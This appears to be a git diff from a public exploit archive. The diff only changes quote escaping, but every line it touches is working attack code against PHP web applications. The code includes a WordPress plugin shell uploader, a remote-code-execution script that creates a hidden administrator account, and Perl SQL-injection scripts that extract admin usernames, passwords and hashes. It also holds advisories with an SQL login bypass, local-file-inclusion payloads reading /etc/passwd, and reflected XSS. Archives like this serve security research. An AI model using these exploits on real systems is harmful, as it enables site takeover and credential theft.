sec]\') -commandList.add_option(\'-t\', \'--target\', action=\"store\", - help=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\", +commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]') +commandList.add_option('-t', '--target', action="store", + help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) -commandList.add_option(\'-f\', \'--file\', action=\"store\", - help=\"Insert file name, ex: shell.php\", +commandList.add_option('-f', '--file', action="store", + help="Insert file name, ex: shell.php", ) -commandList.add_option(\'--timeout\', action=\"store\", default=10, type=\"int\", - help=\"[Timeout Value] - Default 10\", +commandList.add_option('--timeout', action="store", default=10, type="int", + help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() @@ -180,31 +180,31 @@ print(banner) socket.setdefaulttimeout(timeout) -url_symposium_upload = host+\'/wp-content/plugins/wp-symposium/server/php/\' +url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/' -content_type = \'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$\' +content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$' randDirName = id_generator() randShellName = id_generator() bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName) -headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\', - \'content-type\': content_type, - \'content-length\': str(len(bodyupload)) } +headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', + 'content-type': content_type, + 'content-length': str(len(bodyupload)) } try: - req = urllib2.Request(url_symposium_upload+\'index.php\', bodyupload, headers) + req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers) response = urllib2.urlopen(req) read = response.read() - if \"error\" in read or read == \"0\" or read == \"\": - print(\"[X] Upload Failed :(\") + if "error" in read or read == "0" or read == "": + print("[X] Upload Failed :(") else: - print(\"[!] Shell Uploaded\") - print(\"[!] Location: \"+url_symposium_upload+randDirName+randShellName+\".php\\n\") + print("[!] Shell Uploaded") + print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n") except urllib2.HTTPError as e: - print(\"[X] \"+str(e)) + print("[X] "+str(e)) except urllib2.URLError as e: - print(\"[X] Connection Error: \"+str(e)) + print("[X] Connection Error: "+str(e)) diff --git a/platforms/php/webapps/36490.py b/platforms/php/webapps/36490.py index 74c6e0bfc..8c5ace501 100755 --- a/platforms/php/webapps/36490.py +++ b/platforms/php/webapps/36490.py @@ -10,14 +10,14 @@ # # -------------------------------------------------------------------- # -# The vulnerable function is located on \"wpmarketplace/libs/cart.php\" file: +# The vulnerable function is located on "wpmarketplace/libs/cart.php" file: # # function ajaxinit(){ -# if(isset($_POST[\'action\']) && $_POST[\'action\']==\'wpmp_pp_ajax_call\'){ -# if(function_exists($_POST[\'execute\'])) -# call_user_func($_POST[\'execute\'],$_POST); +# if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){ +# if(function_exists($_POST['execute'])) +# call_user_func($_POST['execute'],$_POST); # else -# echo __(\"function not defined!\",\"wpmarketplace\"); +# echo __("function not defined!","wpmarketplace"); # die(); # } #} @@ -25,8 +25,8 @@ # Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook). # wpmp_pp_ajax_call() call functions by call_user_func() through POST data: # -# if (function_exists($_POST[\'execute\'])) -# call_user_func($_POST[\'execute\'], $_POST); +# if (function_exists($_POST['execute'])) +# call_user_func($_POST['execute'], $_POST); # else # ... # ... @@ -61,7 +61,7 @@ # # --------------------------------------------------------------------- # -# Dork google: index of \"wpmarketplace\" +# Dork google: index of "wpmarketplace" # # Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6 # @@ -76,8 +76,8 @@ import optparse # Check url def checkurl(url): - if url[:8] != \"https://\" and url[:7] != \"http://\": - print(\'[X] You must insert http:// or https:// procotol\') + if url[:8] != "https://" and url[:7] != "http://": + print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url @@ -85,29 +85,29 @@ def checkurl(url): # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): - print \'[X] \'+file+\' file is missing or not readable\' + print '[X] '+file+' file is missing or not readable' sys.exit(1) else: return file def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): - return \'\'.join(random.choice(chars) for _ in range(size)) + return ''.join(random.choice(chars) for _ in range(size)) -banner = \"\"\" +banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| - |. / \\ |_____|__| |_____| __|__| |_____|_____|_____| + |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | - `--- ---\' + `--- ---' ___ ___ __ __ __ | Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----. |. | _ | _| <| -__| _| _ | | _ | __| -__| - |. \\_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____| + |. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____| |: | | |__| |::.|:. | - `--- ---\' + `--- ---' WP Marketplace R3m0t3 C0d3 Ex3cut10n (Add WP Admin) @@ -126,14 +126,14 @@ banner = \"\"\" https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww -\"\"\" +""" -commandList = optparse.OptionParser(\'usage: %prog -t URL [--timeout sec]\') -commandList.add_option(\'-t\', \'--target\', action=\"store\", - help=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\", +commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]') +commandList.add_option('-t', '--target', action="store", + help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) -commandList.add_option(\'--timeout\', action=\"store\", default=10, type=\"int\", - help=\"[Timeout Value] - Default 10\", +commandList.add_option('--timeout', action="store", default=10, type="int", + help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() @@ -154,30 +154,30 @@ socket.setdefaulttimeout(timeout) username = id_generator() pwd = id_generator() -body = urllib.urlencode({\'action\' : \'wpmp_pp_ajax_call\', - \'execute\' : \'wp_insert_user\', - \'user_login\' : username, - \'user_pass\' : pwd, - \'role\' : \'administrator\'}) +body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call', + 'execute' : 'wp_insert_user', + 'user_login' : username, + 'user_pass' : pwd, + 'role' : 'administrator'}) -headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\'} +headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} -print \"[+] Tryng to connect to: \"+host +print "[+] Tryng to connect to: "+host try: - req = urllib2.Request(host+\"/\", body, headers) + req = urllib2.Request(host+"/", body, headers) response = urllib2.urlopen(req) html = response.read() - if html == \"\": - print(\"[!] Account Added\") - print(\"[!] Location: \"+host+\"/wp-login.php\") - print(\"[!] Username: \"+username) - print(\"[!] Password: \"+pwd) + if html == "": + print("[!] Account Added") + print("[!] Location: "+host+"/wp-login.php") + print("[!] Username: "+username) + print("[!] Password: "+pwd) else: - print(\"[X] Exploitation Failed :(\") + print("[X] Exploitation Failed :(") except urllib2.HTTPError as e: - print(\"[X] \"+str(e)) + print("[X] "+str(e)) except urllib2.URLError as e: - print(\"[X] Connection Error: \"+str(e)) + print("[X] Connection Error: "+str(e)) diff --git a/platforms/php/webapps/3729.txt b/platforms/php/webapps/3729.txt index 44505bd89..d34d3c752 100755 --- a/platforms/php/webapps/3729.txt +++ b/platforms/php/webapps/3729.txt @@ -1,8 +1,8 @@ . . . ._ | _. .|_ _. _.;_/ -[_)|(_]\\_|[ )(_](_.| \\.net +[_)|(_]\_|[ )(_](_.| \.net | ._| -\"QDBlog v0.4 - MULTIPLE VULNERABILITIES\" +"QDBlog v0.4 - MULTIPLE VULNERABILITIES" by Omni 1) Infos @@ -29,8 +29,8 @@ Team : Playhack.net Security [ authenticate.php Script - Line 7 - 9 ] -$sql = \"SELECT permissions, username FROM $prefix\".\"auth WHERE username = \'\" . $_POST[\'username\'] . \"\' AND password = -MD5(\'\".$_POST[\'wordpass\'].\"\');\"; +$sql = "SELECT permissions, username FROM $prefix"."auth WHERE username = '" . $_POST['username'] . "' AND password = +MD5('".$_POST['wordpass']."');"; $query = mysql_query($sql, $conn); @@ -42,7 +42,7 @@ properly sanitized before being used, so an attacker can inject SQL code and gai --- [ PoC ] --- =============== -Put in the username field (in login.php) a code like 1\' OR \'1\' = \'1\' # and in the password filed what you want. +Put in the username field (in login.php) a code like 1' OR '1' = '1' # and in the password filed what you want. Click.. login and.. have fun :D --- [ Local File Inclusion ] --- @@ -53,7 +53,7 @@ index.php as shown below: [ categories.php script - Line 2 ] -include(\"themes/$theme/cat_top.php\"); +include("themes/$theme/cat_top.php"); [ end index.php script ] @@ -67,9 +67,9 @@ http://remote_host/qdblog/categories.php?theme=../../../../../../../etc/passwd%0 Take again a look to categories.php: -in this file there is \"an other vulnerability\", File Traversal: +in this file there is "an other vulnerability", File Traversal: - Line 3 : $file1 = fopen(\"themes/$theme/cat_mid.html\", \"r\"); + Line 3 : $file1 = fopen("themes/$theme/cat_mid.html", "r"); diff --git a/platforms/php/webapps/4135.pl b/platforms/php/webapps/4135.pl index 0ba8a8cac..d848d25b1 100755 --- a/platforms/php/webapps/4135.pl +++ b/platforms/php/webapps/4135.pl @@ -4,26 +4,26 @@ # require LWP::UserAgent; -print \"# +print "# # phpEventCalendar <= v0.2.3 SQL Injection Exploit # By Iron - ironwarez.info # Thanks to Silentz for the help :) # Greets to everyone at RootShell Security Group & dHack # # Example target url: http://www.target.com/phpeventcalendar/ -Target url?\"; +Target url?"; chomp($target=); -if($target !~ /^http:\\/\\//) +if($target !~ /^http:\/\//) { - $target = \"http://\".$target; + $target = "http://".$target; } -if($target !~ /\\/$/) +if($target !~ /\/$/) { - $target .= \"/\"; + $target .= "/"; } -print \"User id to retrieve name/password from? (1 = admin)\"; +print "User id to retrieve name/password from? (1 = admin)"; chomp($target_id=); -$target .= \"eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=\".$target_id; +$target .= "eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=".$target_id; $ua = LWP::UserAgent->new; $ua->timeout(10); @@ -33,20 +33,20 @@ $response = $ua->get($target); if ($response->is_success) { - if($response->content =~ /(.*)<\\/span>/i) + if($response->content =~ /(.*)<\/span>/i) { ($username,$password) = split(/,/,$1); - print \"Username: \".$username; - print \"\\nPassword: \".$password; + print "Username: ".$username; + print "\nPassword: ".$password; } else { - print \"\\nUnable to retrieve username/password.\"; + print "\nUnable to retrieve username/password."; } } else { - die \"Error: \".$response->status_line; + die "Error: ".$response->status_line; } # milw0rm.com [2007-07-01] diff --git a/platforms/php/webapps/5696.pl b/platforms/php/webapps/5696.pl index 7b96f11f0..92cba4ac9 100755 --- a/platforms/php/webapps/5696.pl +++ b/platforms/php/webapps/5696.pl @@ -26,52 +26,52 @@ ######################################## #----------------------------------------------------------------------------# ######################################## -system(\"color 02\"); -print \"\\t\\t############################################################\\n\\n\"; -print \"\\t\\t# PHP Booking Calendar 10 d - Remote SQL Inj Exploit #\\n\\n\"; -print \"\\t\\t# by Stack #\\n\\n\"; -print \"\\t\\t############################################################\\n\\n\"; +system("color 02"); +print "\t\t############################################################\n\n"; +print "\t\t# PHP Booking Calendar 10 d - Remote SQL Inj Exploit #\n\n"; +print "\t\t# by Stack #\n\n"; +print "\t\t############################################################\n\n"; ######################################## #----------------------------------------------------------------------------# ######################################## use LWP::UserAgent; -die \"Example: perl $0 http://victim.com/path/\\n\" unless @ARGV; -system(\"color f\"); +die "Example: perl $0 http://victim.com/path/\n" unless @ARGV; +system("color f"); ######################################## #----------------------------------------------------------------------------# ######################################## #the username of news manages -$user=\"username\"; +$user="username"; #the pasword of news manages -$pass=\"passwd\"; +$pass="passwd"; #the tables of news manages -$tab=\"booking_user\"; -$fil=\"details_view.php\"; -$varo=\"event_id\"; +$tab="booking_user"; +$fil="details_view.php"; +$varo="event_id"; ######################################## #----------------------------------------------------------------------------# ######################################## -$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\"; -$b->agent(\'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\'); +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); ######################################## #----------------------------------------------------------------------------# ######################################## -$host = $ARGV[0] . \"/\".$fil.\"?\".$varo.\"=-1+union+all+select+1,1,concat_ws(char(58),char(58),\".$user.\",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,\".$pass.\",1,1,1 from+\".$tab.\"/*\"; +$host = $ARGV[0] . "/".$fil."?".$varo."=-1+union+all+select+1,1,concat_ws(char(58),char(58),".$user.",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,".$pass.",1,1,1 from+".$tab."/*"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; ######################################## #----------------------------------------------------------------------------# ######################################## if ($answer =~ /::(.*?)::::/){ - print \"\\nBrought to you by v4-team.com...\\n\"; - print \"\\n[+] Admin User : $1\"; + print "\nBrought to you by v4-team.com...\n"; + print "\n[+] Admin User : $1"; } ######################################## #----------------------------------------------------------------------------# ######################################## -if ($answer =~/([0-9a-fA-F]{32})/){print \"\\n[+] Admin Hash : $1\\n\\n\"; -print \"\\t\\t# Exploit has ben aported user and password hash #\\n\\n\";} -else{print \"\\n[-] Exploit Failed...\\n\";} +if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n"; +print "\t\t# Exploit has ben aported user and password hash #\n\n";} +else{print "\n[-] Exploit Failed...\n";} ######################################## #-------------------Exploit exploited by Stack --------------------# ######################################## diff --git a/platforms/php/webapps/5870.txt b/platforms/php/webapps/5870.txt index 5e8fbcd2d..2d11ad8d0 100755 --- a/platforms/php/webapps/5870.txt +++ b/platforms/php/webapps/5870.txt @@ -18,13 +18,13 @@ #################### 2. Vulnerabilities: #################### - 2.1. Local File Inclusion (LFI) in \"/functions.php\" in \"FORUM_LANGUAGE\" parameter. + 2.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter. 2.1.1. Exploit: Check the exploit/POC section. 2.2. File (image) Upload without premission. 2.2.1. Exploit: Check the exploit/POC section. - 2.3. Cross Site Scripting (XSS). Reflected XSS attack in \"search.php\". + 2.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php". 2.3.1. Exploit: Check the exploit/POC section. @@ -32,7 +32,7 @@ 3. Exploits/POCs: #################### Original Exploit URL: http://bugreport.ir/index.php?/46/exploit - 3.1. Local File Inclusion (LFI) in \"/functions.php\" in \"FORUM_LANGUAGE\" parameter. + 3.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter. ------------- LFI: http://[URL]/[Forum Path]/functions.php?FORUM_LANGUAGE=/../../../../../../../../../../etc/passwd @@ -42,15 +42,15 @@ Uploader link: http://[URL]/[Forum Path]/upload.php ------------- - 3.3. Cross Site Scripting (XSS). Reflected XSS attack in \"search.php\". + 3.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php". ------------- -
+
XSS:

-
 search only in topics
 search in topics and answers

+
 search only in topics
 search in topics and answers